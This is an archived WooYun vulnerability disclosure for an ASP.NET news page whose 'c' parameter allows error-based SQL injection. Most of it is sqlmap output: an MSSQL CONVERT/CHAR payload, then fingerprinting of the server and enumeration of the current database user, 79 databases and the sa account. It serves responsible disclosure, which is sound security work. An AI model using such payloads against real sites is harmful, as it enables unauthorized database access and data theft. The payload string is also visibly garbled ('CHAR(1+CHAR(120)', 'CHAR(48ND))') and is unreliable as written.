WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
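2015-12-16: Details reported to the vendor; awaiting vendor handling
2015-12-18: Vendor confirmed; details disclosed to the vendor only
2015-12-28: Details disclosed to core white hats and experts in related fields
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public
Injection point: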
http://**.**.**.**/NewsArticle.aspx?t=42&n=1233&c=27
It is an error-based injection.
Place: GET
Parameter: c
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clau
    Payload: t=42&n=1231&c=27 AND 1971=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(1+CHAR(120)+CHAR(58)+(SELECT (CASE WHEN (1971=1971) THEN CHAR(49) ELSE CHAR(48ND))+CHAR(58)+CHAR(119)+CHAR(120)+CHAR(121)+CHAR(58)))
---
[10:57:14] [INFO] testing Microsoft SQL Server
[10:57:14] [INFO] confirming Microsoft SQL Server
[10:57:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[10:57:22] [INFO] fetching current user
[10:57:22] [INFO] retrieved: sinocell
current user: 'sinocell'
79 databases are involved.
database management system users [2]:
[*] sa
[*] sinocell
Severity: High
Vulnerability Rank: 17
Confirmed at: 2015-12-18 19:08
Thank you for the report.
None yet